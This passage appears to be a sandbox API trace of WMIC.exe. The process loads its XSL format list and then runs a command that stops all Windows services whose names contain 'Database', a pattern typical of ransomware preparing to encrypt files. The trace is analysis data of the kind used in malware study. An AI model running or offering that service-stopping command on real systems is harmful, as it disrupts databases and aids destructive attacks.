(param_1="XML") returned 0x3 [0255.178] SysStringLen (param_1="htable-sortby") returned 0xd [0255.178] malloc (_Size=0x30) returned 0x2a8480 [0255.178] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.179] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.179] IUnknown:Release (This=0x220a280) returned 0x0 [0255.179] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=17, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.179] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="mof.xsl") returned 0x0 [0255.179] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.179] malloc (_Size=0x18) returned 0x2ac9a0 [0255.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.179] free (_Block=0x2ac9a0) [0255.179] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0255.179] malloc (_Size=0x18) returned 0x2ac9a0 [0255.179] malloc (_Size=0x18) returned 0x2ac9c0 [0255.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.179] SysStringLen (param_1="TABLE") returned 0x5 [0255.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.179] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.179] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.180] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.180] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.180] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.180] malloc (_Size=0x30) returned 0x2a84c0 [0255.181] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.181] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.181] IUnknown:Release (This=0x220a280) returned 0x0 [0255.181] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=18, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.181] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="mof.xsl") returned 0x0 [0255.181] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.181] malloc (_Size=0x18) returned 0x2ac9e0 [0255.181] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.181] free (_Block=0x2ac9e0) [0255.181] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0255.181] malloc (_Size=0x18) returned 0x2ac9e0 [0255.181] malloc (_Size=0x18) returned 0x2aca00 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] SysStringLen (param_1="TABLE") returned 0x5 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0255.182] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.182] SysStringLen (param_1="wmiclimofformat") returned 0xf [0255.182] malloc (_Size=0x30) returned 0x2a8500 [0255.182] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.182] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.182] IUnknown:Release (This=0x220a280) returned 0x0 [0255.182] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=19, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.182] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="textvaluelist.xsl") returned 0x0 [0255.182] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.182] malloc (_Size=0x18) returned 0x2aca20 [0255.182] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.183] free (_Block=0x2aca20) [0255.183] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0255.183] malloc (_Size=0x18) returned 0x2aca20 [0255.183] malloc (_Size=0x18) returned 0x2aca40 [0255.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.183] SysStringLen (param_1="TABLE") returned 0x5 [0255.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.183] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.183] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.183] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.183] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.183] malloc (_Size=0x30) returned 0x2a8540 [0255.183] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.183] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.183] IUnknown:Release (This=0x220a280) returned 0x0 [0255.183] IXMLDOMNodeList:get_item (in: This=0x2209cc0, index=20, listItem=0x1ef590 | out: listItem=0x1ef590*=0x220bd50) returned 0x0 [0255.184] IXMLDOMNode:get_text (in: This=0x220bd50, text=0x1ef5a0 | out: text=0x1ef5a0*="textvaluelist.xsl") returned 0x0 [0255.184] IXMLDOMNode:get_attributes (in: This=0x220bd50, attributeMap=0x1ef598 | out: attributeMap=0x1ef598*=0x22078d0) returned 0x0 [0255.184] malloc (_Size=0x18) returned 0x2aca60 [0255.184] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22078d0, name="KEYWORD", namedItem=0x1ef5a8 | out: namedItem=0x1ef5a8*=0x220a280) returned 0x0 [0255.184] free (_Block=0x2aca60) [0255.184] IXMLDOMNode:get_nodeValue (in: This=0x220a280, value=0x1ef5e0 | out: value=0x1ef5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0255.184] malloc (_Size=0x18) returned 0x2aca60 [0255.184] malloc (_Size=0x18) returned 0x2aca80 [0255.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.184] SysStringLen (param_1="TABLE") returned 0x5 [0255.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.184] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0255.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.184] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0255.184] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.184] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.185] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.185] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0255.185] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0255.185] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0255.185] malloc (_Size=0x30) returned 0x2a8580 [0255.185] IUnknown:Release (This=0x220bd50) returned 0x0 [0255.185] IUnknown:Release (This=0x22078d0) returned 0x0 [0255.185] IUnknown:Release (This=0x220a280) returned 0x0 [0255.185] IUnknown:Release (This=0x2209cc0) returned 0x0 [0255.185] FreeThreadedDOMDocument:IUnknown:Release (This=0x220bc50) returned 0x1 [0255.185] FreeThreadedDOMDocument:IUnknown:Release (This=0x22071d0) returned 0x0 [0255.185] free (_Block=0x2a6f30) [0255.185] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice" [0255.185] malloc (_Size=0xe0) returned 0x2a6ef0 [0255.185] memcpy_s (in: _Destination=0x2a6ef0, _DestinationSize=0xde, _Source=0x3725ee, _SourceSize=0xd2 | out: _Destination=0x2a6ef0) returned 0x0 [0255.185] malloc (_Size=0x18) returned 0x2acaa0 [0255.186] malloc (_Size=0x18) returned 0x2acac0 [0255.186] malloc (_Size=0x18) returned 0x2acae0 [0255.186] malloc (_Size=0x18) returned 0x2acb00 [0255.186] malloc (_Size=0x80) returned 0x2acd30 [0255.186] GetLocalTime (in: lpSystemTime=0x1ef750 | out: lpSystemTime=0x1ef750*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0xd, wMilliseconds=0x190)) [0255.186] _vsnwprintf (in: _Buffer=0x2acd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1ef6a8 | out: _Buffer="04-28-2020T20:42:13") returned 19 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] malloc (_Size=0x8e) returned 0x2acdc0 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] malloc (_Size=0x8e) returned 0x2ace60 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.186] malloc (_Size=0xa) returned 0x2acb20 [0255.186] lstrlenW (lpString="path") returned 4 [0255.186] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0255.186] malloc (_Size=0xa) returned 0x2acb40 [0255.186] malloc (_Size=0x8) returned 0x2a7140 [0255.186] free (_Block=0x0) [0255.186] free (_Block=0x2acb20) [0255.187] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.187] malloc (_Size=0x1c) returned 0x2acf00 [0255.187] lstrlenW (lpString="Win32_Service") returned 13 [0255.187] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0255.187] malloc (_Size=0x1c) returned 0x2acf30 [0255.187] malloc (_Size=0x10) returned 0x2acb20 [0255.187] memmove_s (in: _Destination=0x2acb20, _DestinationSize=0x8, _Source=0x2a7140, _SourceSize=0x8 | out: _Destination=0x2acb20) returned 0x0 [0255.187] free (_Block=0x2a7140) [0255.187] free (_Block=0x0) [0255.187] free (_Block=0x2acf00) [0255.187] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.187] malloc (_Size=0xc) returned 0x2acb60 [0255.187] lstrlenW (lpString="where") returned 5 [0255.187] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0255.187] malloc (_Size=0xc) returned 0x2acb80 [0255.187] malloc (_Size=0x18) returned 0x2acba0 [0255.187] memmove_s (in: _Destination=0x2acba0, _DestinationSize=0x10, _Source=0x2acb20, _SourceSize=0x10 | out: _Destination=0x2acba0) returned 0x0 [0255.187] free (_Block=0x2acb20) [0255.187] free (_Block=0x0) [0255.187] free (_Block=0x2acb60) [0255.187] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.187] malloc (_Size=0x36) returned 0x2a85c0 [0255.187] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0255.187] _wcsicmp (_String1="\"name like '%%Database%%'\"", _String2="\"NULL\"") returned -20 [0255.187] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0255.187] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0255.187] malloc (_Size=0x36) returned 0x2a8600 [0255.188] malloc (_Size=0x20) returned 0x2acf00 [0255.188] memmove_s (in: _Destination=0x2acf00, _DestinationSize=0x18, _Source=0x2acba0, _SourceSize=0x18 | out: _Destination=0x2acf00) returned 0x0 [0255.188] free (_Block=0x2acba0) [0255.188] free (_Block=0x0) [0255.188] free (_Block=0x2a85c0) [0255.188] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.188] malloc (_Size=0xa) returned 0x2acba0 [0255.188] lstrlenW (lpString="call") returned 4 [0255.188] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0255.188] malloc (_Size=0xa) returned 0x2acb60 [0255.188] malloc (_Size=0x30) returned 0x2a85c0 [0255.188] memmove_s (in: _Destination=0x2a85c0, _DestinationSize=0x20, _Source=0x2acf00, _SourceSize=0x20 | out: _Destination=0x2a85c0) returned 0x0 [0255.188] free (_Block=0x2acf00) [0255.188] free (_Block=0x0) [0255.188] free (_Block=0x2acba0) [0255.188] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 70 [0255.188] malloc (_Size=0x18) returned 0x2acba0 [0255.188] lstrlenW (lpString="stopservice") returned 11 [0255.188] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0255.188] malloc (_Size=0x18) returned 0x2acb20 [0255.188] free (_Block=0x0) [0255.188] free (_Block=0x2acba0) [0255.188] malloc (_Size=0x30) returned 0x2a8640 [0255.188] lstrlenW (lpString="QUIT") returned 4 [0255.188] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0255.189] lstrlenW (lpString="EXIT") returned 4 [0255.189] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0255.189] free (_Block=0x2a8640) [0255.189] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x2 [0255.189] malloc (_Size=0x30) returned 0x2a8640 [0255.189] lstrlenW (lpString="/") returned 1 [0255.189] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0255.189] lstrlenW (lpString="-") returned 1 [0255.189] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0255.189] lstrlenW (lpString="CLASS") returned 5 [0255.189] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0255.189] lstrlenW (lpString="PATH") returned 4 [0255.189] lstrlenW (lpString="path") returned 4 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0255.189] lstrlenW (lpString="/") returned 1 [0255.189] lstrlenW (lpString="Win32_Service") returned 13 [0255.189] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0255.189] lstrlenW (lpString="-") returned 1 [0255.190] lstrlenW (lpString="Win32_Service") returned 13 [0255.190] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0255.190] lstrlenW (lpString="Win32_Service") returned 13 [0255.190] malloc (_Size=0x1c) returned 0x2acf00 [0255.190] lstrlenW (lpString="Win32_Service") returned 13 [0255.190] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0255.190] lstrlenW (lpString="Win32_Service") returned 13 [0255.190] malloc (_Size=0x1c) returned 0x2a7140 [0255.190] lstrlenW (lpString="Win32_Service") returned 13 [0255.190] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xfffffffffff46470 | out: _String=0x0, _Context=0xfffffffffff46470) returned 0x0 [0255.190] lstrlenW (lpString="") returned 0 [0255.190] lstrlenW (lpString="WHERE") returned 5 [0255.190] lstrlenW (lpString="where") returned 5 [0255.190] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0255.190] lstrlenW (lpString="/") returned 1 [0255.190] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0255.190] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Database%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0255.190] lstrlenW (lpString="-") returned 1 [0255.190] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0255.190] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Database%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0255.190] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0255.190] malloc (_Size=0x32) returned 0x2a8680 [0255.190] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0255.190] lstrlenW (lpString="/") returned 1 [0255.190] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0255.191] lstrlenW (lpString="-") returned 1 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] malloc (_Size=0xa) returned 0x2acba0 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] lstrlenW (lpString="GET") returned 3 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0255.191] lstrlenW (lpString="LIST") returned 4 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0255.191] lstrlenW (lpString="SET") returned 3 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0255.191] lstrlenW (lpString="CREATE") returned 6 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0255.191] lstrlenW (lpString="CALL") returned 4 [0255.191] lstrlenW (lpString="call") returned 4 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0255.191] lstrlenW (lpString="/") returned 1 [0255.191] lstrlenW (lpString="stopservice") returned 11 [0255.191] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0255.192] lstrlenW (lpString="-") returned 1 [0255.192] lstrlenW (lpString="stopservice") returned 11 [0255.192] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0255.192] lstrlenW (lpString="stopservice") returned 11 [0255.192] malloc (_Size=0x18) returned 0x2acbc0 [0255.192] lstrlenW (lpString="stopservice") returned 11 [0255.192] ??0CHString@@QEAA@XZ () returned 0x1ed2f8 [0255.192] GetCurrentThreadId () returned 0x6fc [0255.192] GetCurrentThreadId () returned 0x6fc [0255.192] ??0CHString@@QEAA@XZ () returned 0x1ed0c8 [0255.192] malloc (_Size=0x8) returned 0x2acf60 [0255.192] malloc (_Size=0x18) returned 0x2acbe0 [0255.192] malloc (_Size=0x18) returned 0x2acc00 [0255.192] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d2950 | out: ppNamespace=0xff4d2950*=0x1d03a98) returned 0x0 [0255.214] free (_Block=0x2acc00) [0255.214] CoSetProxyBlanket (pProxy=0x1d03a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0255.214] free (_Block=0x2acf60) [0255.215] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.215] free (_Block=0x2acbe0) [0255.215] malloc (_Size=0x18) returned 0x2acbe0 [0255.215] IWbemServices:GetObject (in: This=0x1d03a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1ed2d8*=0x0, ppCallResult=0x0 | out: ppObject=0x1ed2d8*=0x1d2bfa0, ppCallResult=0x0) returned 0x0 [0255.234] free (_Block=0x2acbe0) [0255.234] IWbemClassObject:BeginMethodEnumeration (This=0x1d2bfa0, lEnumFlags=0) returned 0x0 [0255.234] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="StartService", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.234] lstrlenW (lpString="StartService") returned 12 [0255.234] lstrlenW (lpString="stopservice") returned 11 [0255.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0255.234] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.234] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="StopService", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.234] lstrlenW (lpString="StopService") returned 11 [0255.234] lstrlenW (lpString="stopservice") returned 11 [0255.234] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0255.234] malloc (_Size=0x70) returned 0x2acf60 [0255.234] ??0CHString@@QEAA@XZ () returned 0x1ecc88 [0255.234] GetCurrentThreadId () returned 0x6fc [0255.235] IWbemClassObject:GetNames (in: This=0x1d2c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x1ecc80 | out: pNames=0x1ecc80*="\x01ƀ\x08") returned 0x0 [0255.235] SafeArrayGetLBound (in: psa=0x414af0, nDim=0x1, plLbound=0x1ecc98 | out: plLbound=0x1ecc98) returned 0x0 [0255.235] SafeArrayGetUBound (in: psa=0x414af0, nDim=0x1, plUbound=0x1ecc94 | out: plUbound=0x1ecc94) returned 0x0 [0255.235] SafeArrayGetElement (in: psa=0x414af0, rgIndices=0x1ecc74, pv=0x1ecc78 | out: pv=0x1ecc78) returned 0x0 [0255.235] malloc (_Size=0x48) returned 0x2acfe0 [0255.235] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1d2c4a0, wszProperty="ReturnValue", ppQualSet=0x1ecac8 | out: ppQualSet=0x1ecac8*=0x1cf13b0) returned 0x0 [0255.235] malloc (_Size=0x18) returned 0x2acbe0 [0255.235] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="CIMTYPE", lFlags=0, pVal=0x1ecb50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0x1ecb50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0255.236] free (_Block=0x2acbe0) [0255.236] malloc (_Size=0x18) returned 0x2acbe0 [0255.236] IWbemClassObject:Get (in: This=0x1d2c4a0, wszName="ReturnValue", lFlags=0, pVal=0x1ecbf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1ecad8*=2018080, plFlavor=0x0 | out: pVal=0x1ecbf8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0x1ecad8*=19, plFlavor=0x0) returned 0x0 [0255.236] malloc (_Size=0x18) returned 0x2acc00 [0255.236] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="read", lFlags=0, pVal=0x1ecae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4d2ac0), plFlavor=0x0 | out: pVal=0x1ecae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4d2ac0), plFlavor=0x0) returned 0x80041002 [0255.236] free (_Block=0x2acc00) [0255.236] malloc (_Size=0x18) returned 0x2acc00 [0255.236] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="write", lFlags=0, pVal=0x1ecae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4d2ac0), plFlavor=0x0 | out: pVal=0x1ecae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xff4d2ac0), plFlavor=0x0) returned 0x80041002 [0255.236] free (_Block=0x2acc00) [0255.236] malloc (_Size=0x18) returned 0x2acc00 [0255.236] malloc (_Size=0x18) returned 0x2acc20 [0255.237] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Description", lFlags=0, pVal=0x1ecb90*(varType=0x0, wReserved1=0x1e, wReserved2=0x0, wReserved3=0x0, varVal1=0xff474293, varVal2=0x1ecb98), plFlavor=0x0 | out: pVal=0x1ecb90*(varType=0x0, wReserved1=0x1e, wReserved2=0x0, wReserved3=0x0, varVal1=0xff474293, varVal2=0x1ecb98), plFlavor=0x0) returned 0x80041002 [0255.237] free (_Block=0x2acc20) [0255.237] malloc (_Size=0x18) returned 0x2acc20 [0255.237] lstrlenA (lpString="Not Available") returned 13 [0255.237] malloc (_Size=0x1c) returned 0x2ad030 [0255.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4622f0, cbMultiByte=-1, lpWideCharStr=0x2ad030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0255.237] free (_Block=0x2ad030) [0255.237] IUnknown:Release (This=0x1cf13b0) returned 0x0 [0255.237] malloc (_Size=0x48) returned 0x2ad030 [0255.237] malloc (_Size=0x18) returned 0x2acc40 [0255.237] malloc (_Size=0x48) returned 0x2ad080 [0255.237] malloc (_Size=0x70) returned 0x2ad0d0 [0255.237] malloc (_Size=0x48) returned 0x2ad150 [0255.237] free (_Block=0x2ad080) [0255.237] free (_Block=0x2ad030) [0255.237] free (_Block=0x2acfe0) [0255.237] free (_Block=0x2acc00) [0255.238] free (_Block=0x2acc20) [0255.238] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.238] IWbemClassObject:GetMethodQualifierSet (in: This=0x1d2bfa0, wszMethod="StopService", ppQualSet=0x1ed1f8 | out: ppQualSet=0x1ed1f8*=0x1cf13b0) returned 0x0 [0255.238] malloc (_Size=0x18) returned 0x2acc20 [0255.238] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Implemented", lFlags=0, pVal=0x1ed208*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4117e08ac8, varVal2=0xff4744fb), plFlavor=0x0 | out: pVal=0x1ed208*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d4117e08ac8, varVal2=0xff4744fb), plFlavor=0x0) returned 0x80041002 [0255.238] free (_Block=0x2acc20) [0255.238] malloc (_Size=0x18) returned 0x2acc20 [0255.238] malloc (_Size=0x18) returned 0x2acc00 [0255.238] IWbemQualifierSet:Get (in: This=0x1cf13b0, wszName="Description", 